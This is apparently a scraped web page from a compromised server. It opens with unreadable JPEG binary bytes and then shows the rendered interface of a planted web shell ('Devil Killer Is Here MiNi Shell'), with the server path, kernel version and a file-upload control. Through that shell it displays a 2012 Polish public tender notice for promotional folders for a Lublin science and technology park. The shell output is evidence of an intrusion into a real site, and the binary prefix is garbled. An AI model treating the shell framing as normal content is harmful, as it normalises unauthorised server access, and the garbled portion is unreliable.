JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121008/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121008/386688-N-2012.html

<p class="kh_header"><b>Lublin: Opracowanie i wydrukowanie folderów promocyjnych przedstawiających kompleksowy wachlarz usług oferowanych na rynku przez Lubelski Park Naukowo -Technologiczny S.A.</b><br>
<b>Numer ogłoszenia: 386688 - 2012; data zamieszczenia: 08.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Lubelski Park Naukowo-Technologiczny Spółka Akcyjna , ul. Dobrzańskiego 3, 20-262 Lublin, woj. lubelskie, tel. 81 534 61 00, faks 81 531 85 48.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka Akcyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie i wydrukowanie folderów promocyjnych przedstawiających kompleksowy wachlarz usług oferowanych na rynku przez Lubelski Park Naukowo -Technologiczny S.A..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.2.1.Przedmiotem zamówienia jest opracowanie i wydrukowanie folderów promocyjnych przedstawiających kompleksowy wachlarz usług oferowanych na rynku przez Lubelski Park Naukowo - Technologiczny S.A. 
3.2.2. Wykonawca jest zobowiązany na bieżąco referować Zamawiającemu postęp prac nad przedmiotem zamówienia, jak również przedstawiać postęp prac na spotkaniu w siedzibie Zamawiającego w ten sposób, żeby odbyły się  przynajmniej trzy spotkania w siedzibie Zamawiającego, przy czym o terminie spotkania Wykonawca powinien powiadomić Zamawiającego z tygodniowym wyprzedzeniem. Spotkania mają na celu dostosowanie wizji Wykonawcy do wymagań Zamawiającego. Po każdym spotkaniu Wykonawca zobowiązany jest sporządzić notatkę służbową ze spotkania i przekazać Zamawiającemu. Odwołanie któregokolwiek spotkania przez Zamawiającego nie ma wpływu na terminy określone w p 4.1.
3.2.3. Wykonawca zobowiązany jest opracować i wydrukować foldery o strukturze i treści obejmującej co najmniej wymienione poniżej elementy (w nawiasie kwadratowym podane zostały liczby stron, które Wykonawca powinien przeznaczyć na zaprezentowanie poszczególnych punktów)
3.2.3.1. Strona tytułowa zawierająca logo firmy (1 strona) a) Pierwsza strona wykonana zostanie w technologii druku trójwymiarowego i zawierała będzie zdjęcie panoramiczne budynku LPNT S.A. (w dwóch wariantach za dnia i nocą, zastępujące się przy zmianie kąta patrzenia).
b) Przykładowy opis strony tytułowej zdjęcia umieszczone zostaną w dolnej części strony i zajmą przestrzeń od dolnej krawędzi do 16 cm (licząc od dolnej krawędzi ). Budynek znajdujący się na zdjęciu będzie sięgał 11 cm od dolnej krawędzi strony, a przestrzeń powyżej wypełni obraz nieba (pomiędzy 11 cm a 16 cm licząc od dołu strony). Pomiędzy 16 cm a 26 cm (od dołu strony) zamieszczone zostanie logo LPNT S.A., a poniżej logo napis Lubelski Park Naukowo Technologiczny S.A. (czcionka Tahoma-Bold, kolor biały dla wersji nocnej i czarny dla wersji dziennej). Tło na stronie tytułowej będzie miało kolor w wersji dziennej jasnoniebieski (gradient pionowy, jaśniejszy na górze strony), natomiast w wersji nocnej kolor czarny. Wraz ze zmianą kąta patrzenia cała strona powinna zmieniać się z wersji dziennej na wersję nocną.
c) Przedstawiony w punkcie b) opis strony tytułowej stanowi jedynie propozycję i Zleceniodawca oczekuje od Wykonawcy przedstawienia co najmniej trzech propozycji graficznych strony tytułowej.
d) Przykłady zdjęć budynku za dnia i nocą znajdują się na stronie internetowej www.lpnt.pl, przy czym Wykonawca powinien potraktować je tylko jako wzorce i zdjęcia wykonać we własnym zakresie.
3.2.3.2. 	Spis treści (1 strona) Decyzję w sprawie formy spisu treści Zleceniodawca pozostawia do decyzji Wykonawcy.
3.2.3.3. 	Pismo od Prezesa LPNT S.A. wraz z opisem działalności Lubelskiego Parku Naukowo-Technologicznego S.A. (1 strona)
a) Pismo od Prezesa LPNT S.A. powinno zawierać zdjęcie udostępnione przez LPNT S.A., treść dostarczoną przez Zleceniodawcę
b) Opis działalności LPNT S.A. powinien zawierać 1) datę powstania (2005 r.), 2) misję firmy, której treść będzie udostępniona Wykonawcy  przez Zleceniodawcę, 3) korzyści dla interesariuszy LPNT S.A., wyszczególnione według grup firmy współpracujące, lokatorzy, organizatorzy szkoleń, konferencji, targów i wystaw. 
c) Treść zawierającą opis korzyści Wykonawca zobowiązany jest uzgodnić ze Zleceniodawcą.
d) Przy dolnej krawędzi strony Wykonawca zobowiązany jest umieścić piktogramy obrazujące atuty LPNT S.A. (miejsca parkingowe, dostosowanie budynku do potrzeb osób niepełnosprawnych, atuty sal konferencyjnych dobra akustyka, dobre oświetlenie, bezprzewodowy Internet).
3.2.3.3. Zdjęcie budynku LPNT lub jego wnętrza (na całą stronę) (1 strona)
Zdjęcie budynku Wykonawca powinien wykonać we własnym zakresie lub skorzystać ze zdjęć udostępnionych przez Zleceniodawcę.
3.2.3.4. Aula konferencyjna i powierzchnia wystawiennicza (3 strony)
Opis usługi wynajmu auli konferencyjnej i powierzchni wystawienniczej powinien zawierać następujące elementy minimum cztery zdjęcia przedstawiające aulę i powierzchnię wystawienniczą z różnych ujęć, informację o możliwych przeznaczeniach auli konferencyjnej (konferencje, tłumaczenia symultaniczne, wystawy, targi, teatr, kino), możliwości techniczne auli oraz jej pojemność (możliwość podziału auli na trzy sektory, w których dokonywane są tłumaczenia symultaniczne w trzech różnych językach), informację o konferencjach organizowanych przez LPNT S.A.
3.2.3.5. Sale szkoleniowe i mobilna sala komputerowa (2 strony) Opis usługi wynajmu sal szkoleniowych i mobilnej sali komputerowej powinien obejmować
cztery zdjęcia (po jednym do każdej z sal), w tym co najmniej jedno zdjęcie przedstawiające możliwości mobilnej sali komputerowej informację o pojemności sal w zależności od wybranego ustawienia (możliwe ustawienia: teatralne - 45 miejsc, w podkowę - 25, konferencyjne - 35, bankietowe - 50, szkolne - 20)
opis możliwości wykorzystania sal szkoleniowych (spotkania biznesowe, szkolenia, rekrutacje, negocjacje, mediacje, coaching) przedstawienie zalet sal szkoleniowych (dostęp do bezprzewodowego Internetu, dobra akustyka, dobrze dobrane oświetlenie, możliwość wypożyczenia urządzeń dodatkowych - rzutników, ekranów itp.) informację o usłudze kompleksowej obsługi logistycznej szkoleń (obejmującej m.in. catering, transport na trasie hotel - miejsce szkolenia - hotel dla osób spoza Lublina).
3.2.3.6. Wynajem powierzchni biurowych (1,5 strony) informacje o dostępnej powierzchni (w m2) i o mediach dostępnych w biurach, minimum 2 zdjęcia,
korzyści płynące z lokalizacji LPNT S.A. (np. łatwiejszy dostęp do funduszy unijnych (dodatkowe punkty za lokalizację w Parku, wiele miejsc parkingowych, łatwiejsze nawiązywanie relacji biznesowych).
3.2.3.7. Wynajem skrytek biznesowych (0,5 strony) a) Opis usługi wynajmu skrytek biznesowych powinien zawierać krótki opis usługi, wskazywać grupy podmiotów  do których usługa jest skierowana (głównie firmy internetowe oraz przedsiębiorstwa rozpoczynające działalność) oraz podkreślać następujące korzyści: 1) minimalizację kosztów, 2) oszczędność czasu dla firm , 3) obsługę korespondencji najemcy skrytki biznesowej (dodatkowa oprócz odbioru i informowania o nadejściu poczty istnieje możliwość przesyłania dalej korespondencji pod wskazany adres lub skanowania i wysyłania pocztą elektroniczną w postaci pliku JPG).
b) Przy opisie powinno znajdować się jedno zdjęcie skrytek biznesowych.
3.2.3.8. Wynajem powierzchni laboratoryjnej (2 strony) a) Opis usługi wynajmu powierzchni laboratoryjnej powinien zawierać co najmniej 2 zdjęcia,
informację o całkowitej dostępnej powierzchni, informację o dostępie do dygestoriów, informację o wyposażeniu pomieszczeń (instalacja elektryczna, oświetleniowa, teleinformatyczna, wywiewno-nawiewna, posadzka żywiczna),
informację o nowoczesnej aparaturze wartej blisko 30 mln PLN, informację, że LPNT S.A. pomaga w wyposażeniu w nowoczesną aparaturę swoich lokatorów,
informację o dodatkowych korzyściach dla najemców (pomieszczenie socjalne dla pracowników, całodobowy monitoring). b) Opis usługi wynajmu powierzchni laboratoryjnej powinien zawierać ponadto informacje o najciekawszych elementach wyposażenia laboratoriów, w tym silniku Wankla zasilanym benzyną i wodorem (w laboratorium Politechniki Lubelskiej) nowoczesnym kapilarze wykorzystywanym w biologii molekularnej (w Laboratorium Badań Genetycznych)
urządzeniach znajdujących się w Centralnym Laboratorium Agroekologicznym (chromatografach gazowych, spektrometrze ICP-MS, analizatorach aminokwasów i amin biogennych).
3.2.3.10. Pośrednictwo w zakresie prac badawczych, opinie o innowacyjności 
i kojarzenie partnerów (1 strona) Opis usługi pośrednictwa w zakresie prac badawczych, wydawania opinii o innowacyjności i kojarzenia partnerów powinien obejmować informację o organizowanych relacjach (B2B, R2B, R2R), informację o możliwości nawiązania kontaktów zarówno ze środowiskiem biznesu jak i nauki,
informację o rozmiarach znajdującej się w dyspozycji LPNT S.A bazy danych pracowników naukowych, którzy wyrazili gotowość podjęcia współpracy.
3.2.3.11. Inkubator przedsiębiorczości (1 strona) a) Wykonawca jest zobowiązany do ustalenia treści z władzami Inkubatora Technologicznego w Lublinie, działającego w budynku LPNT, przy czym powinna ona obejmować informację o tym, że relacja między LPNT S.A. a Inkubatorem oparta jest na współpracy. 
b) Opracowaną w sposób opisany w punkcie a) treść Wykonawca zobowiązany jest przedstawić do akceptacji Zleceniodawcy. Wykonawca jest zobowiązany zamieścić co najmniej jedno zdjęcie budynku LPNT. 
3.2.3.12. Centrum Innowacji i Transferu Technologii LPNT Sp. z o. o. (1 strona)
a) Wykonawca jest zobowiązany zamieścić zdjęcie budynku lub jego wnętrza zajmujące nie mniej niż 30% strony oraz ustalić treści z władzami CITT LPNT Sp. z o. o. Wykonawcy zobowiązany jest do zamieszczenia informacji o tym, że CITT LPNT Sp. z o. o. jest lokatorem LPNT S.A. i jednocześnie z nim współpracuje. 
b) Opracowaną w ten sposób treść Wykonawca zobowiązany jest przedstawić do akceptacji Zleceniodawcy.
3.2.3.13. Strefa ekonomiczna (1 strona) a) Wykonawca jest zobowiązany do ustalenia treści z władzami Podstrefy Lublin SSE Euro-Park Mielec. Wykonawca jest zobowiązany zamieścić co najmniej jedno zdjęcie z Podstrefy Lublin SSE Euro-Park Mielec, a także zamieścić informację o bezpośrednim sąsiedztwie LPNT S.A. z SSE. 
b) Opracowany tekst Wykonawca zobowiązany jest przedstawić do akceptacji Zleceniodawcy.
3.2.3.14. Nasi lokatorzy (7 stron) a) Sekcja Nasi lokatorzy powinna zawierać opisy działalności poszczególnych lokatorów LPNT S.A. Treść opisów będzie zbliżona pod względem struktury i każdy z opisów powinien zajmować pół strony A4, a opis Centralnego Laboratorium Agroekologicznego (CLA) - całą stronę A4. Opisy muszą zawierać dane kontaktowe lokatorów oraz ich loga. 
b) Szczegółową treść Wykonawca winien uzgodnić z firmami będącymi lokatorami LPNT S.A. Opracowany tekst Wykonawca zobowiązany jest przedstawić do akceptacji Zleceniodawcy.
c) Na ostatniej stronie w tej sekcji zamieszczone zostanie zdjęcie patio znajdującego w budynku LPNT (zdjęcie zajmie połowę strony).
3.2.3.15. Mapa dojazdu z wizualizacją budynku LPNT (1 strona) a) Na ostatniej stronie Wykonawca powinien zamieścić aktualną mapę dojazdu do LPNT S.A., którą Wykonawca zobowiązany jest wykonać we własnym zakresie, oraz kontakt telefoniczny, mailowy, adres siedziby i stronę internetową Zleceniodawcy (www.lpnt.pl). 
b) Pod mapą Wykonawca zamieści zdjęcie z wizualizacją budynku LPNT, które wykona we własnym zakresie lub otrzyma od Zleceniodawcy.
3.2.4. Dopuszcza się modyfikowanie przez Wykonawcę przedstawionych w punktach 3.2.5. wymogów technicznych oraz zakresu merytorycznego, struktury i treści folderów przedstawionych w punkcie 3.2.3. jedynie po uzgodnieniu z Zamawiającym. 
3.2.5. Wykonawca zobowiązany jest sporządzić foldery według następujących  wymogów technicznych
a) papier kredowy o gramaturze 250 - 300 gram (nie dotyczy okładki wykonanej w technologii druku trójwymiarowego)
b) format A3 składany do A4
c) druk kolorowy
d) czcionka Tahoma-Regular, rozmiar 10 Tahoma-Bold, rozmiar 14 w nagłówkach lub inna czcionka bezszeryfowa
e) nakład 3000 sztuk (łącznie dla trzech wersji językowych) w tym w polskiej wersji językowej - 2000 sztuk), w wersji angielskiej - 500 sztuk i w wersji rosyjskiej - 500 sztuk,
f) zgodność z systemem identyfikacji wizualnej projektu, zamieszczenie oznaczeń zgodnych z Wytycznymi dla Beneficjentów w zakresie informacji i promocji w ramach Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007 - 2013 (kolorowe oznaczenia na pierwszej i ostatniej stronie folderów)
g) zgodność z systemem identyfikacji wizualnej LPNT S.A.
3.2.6. Z dniem ostatecznej akceptacji treści i formy opracowania określonym szczegółowo w punkcie 4.1., Wykonawca zobowiązany będzie dostarczyć wersję finalną folderów w nakładzie 3 000 egzemplarzy oraz przekazać Zamawiającemu pliki graficzne opracowania w formacie umożliwiającym druk..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2, 79.34.20.00-3, 22.46.00.00-2, 22.46.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 8.1.Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 800,00 PLN (słownie: osiemset złotych, zero groszy).
8.2.Wadium musi być wniesione przed upływem terminu składania ofert w jednej lub kilku następujących formach, w zależności od wyboru Wykonawcy
a) pieniądzu, przelewem na rachunek bankowy Zamawiającego
92 1160 2202 0000 0001 1618 7785 Bank Millenium S.A. Oddział w Lublinie przed terminem składania ofert, z podaniem tytułu wadium - przetarg nieograniczony znak sprawy LPNT/PN/RPLU.02.03.02/05/2012;
b)poręczeniach bankowych;
c)poręczeniach pieniężnych spółdzielczych kas oszczędnościowo - kredytowych;
d)gwarancjach bankowych;
e) gwarancjach ubezpieczeniowych;
f) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 
9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t. jedn. Dz. U. z 2007 r. Nr 42, poz. 275 ze zm.).
8.3.	Wadium wnoszone w formie poręczeń lub gwarancji powinno być złożone w oryginale i musi obejmować cały okres związania ofertą. Wadium wnoszone w ww. formie powinno być wystawione na: Lubelski Park Naukowo-Technologiczny S.A., 20-262 Lublin, ul. Dobrzańskiego 3. W przypadku wniesienia wadium w formie gwarancji lub poręczenia, koniecznym jest, aby gwarancja lub poręczenie obejmowały odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę, określone w art. 46 ust. 4a i 5 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych.
8.4.	Wadium wniesione w pieniądzu przelewem na rachunek bankowy musi wpłynąć na wskazany w pkt 8.2.a) rachunek bankowy Zamawiającego najpóźniej przed upływem terminu składania ofert. Terminem wpływu wadium jest termin uznania rachunku bankowego Zamawiającego.
8.5.	Zamawiający dokona zwrotu wadium na zasadach określonych w art. 46 ust. 1-4 ustawy Prawo zamówień publicznych
8.6.	Zgodnie z art. 46 ust. 4a i 5 ustawy Prawo zamówień publicznych, Zamawiający zatrzyma wadium wraz z odsetkami, w przypadku gdy:
8.6.1.Wykonawca, którego oferta zostanie wybrana:
1. odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2. nie wniesie wymaganego zabezpieczenia należytego wykonania umowy;
3. zawarcie umowy w sprawie zamówienia publicznego stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy.
8.6.2. Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Prawo zamówień publicznych, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>5.1.2.Posiadania wiedzy i doświadczenia.
Opis sposobu dokonywania oceny spełnienia tego warunku:
Jako spełniający warunki udziału w postępowaniu zostaną ocenieni Wykonawcy, którzy wykażą iż w okresie ostatnich trzech lat przed upływem terminu składania ofert należycie wykonali przynajmniej   dwie usługi opracowanie i wydrukowanie materiałów promocyjnych, takich jak: foldery, broszury, katalogi, biuletyny, ulotki dla przedsiębiorstw oferujących swoje produkty/usługi na rynku, a wartość każdej z tych usług nie była mniejsza niż 25.000 zł.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>5.1.3.2.osoby zdolne do wykonania zamówienia:
jako spełniający warunki udziału w postępowaniu zostaną ocenieni Wykonawcy, którzy wykażą się dysponowaniem następującym zespołem osób:
- co najmniej dwie osoby, które w ciągu ostatnich trzech lat przed upływem terminu składania ofert uczestniczyły w wykonaniu przynajmniej jednej usługi opracowanie i wydrukowanie materiałów promocyjnych, takich jak: foldery, broszury, katalogi, biuletyny, ulotki dla przedsiębiorstw oferujących swoje produkty/usługi na rynku, a wartość każdej z tych usług nie była mniejsza niż 25.000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty, pełnomocnictwa, oświadczenia o części zamówienia, której wykonanie wykonawca zamierza powierzyc podwykonawcom. Dokumenty poręczeń i gwarancji w przypadku wniesienia wadium w innej formie niż w pieniądzu.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
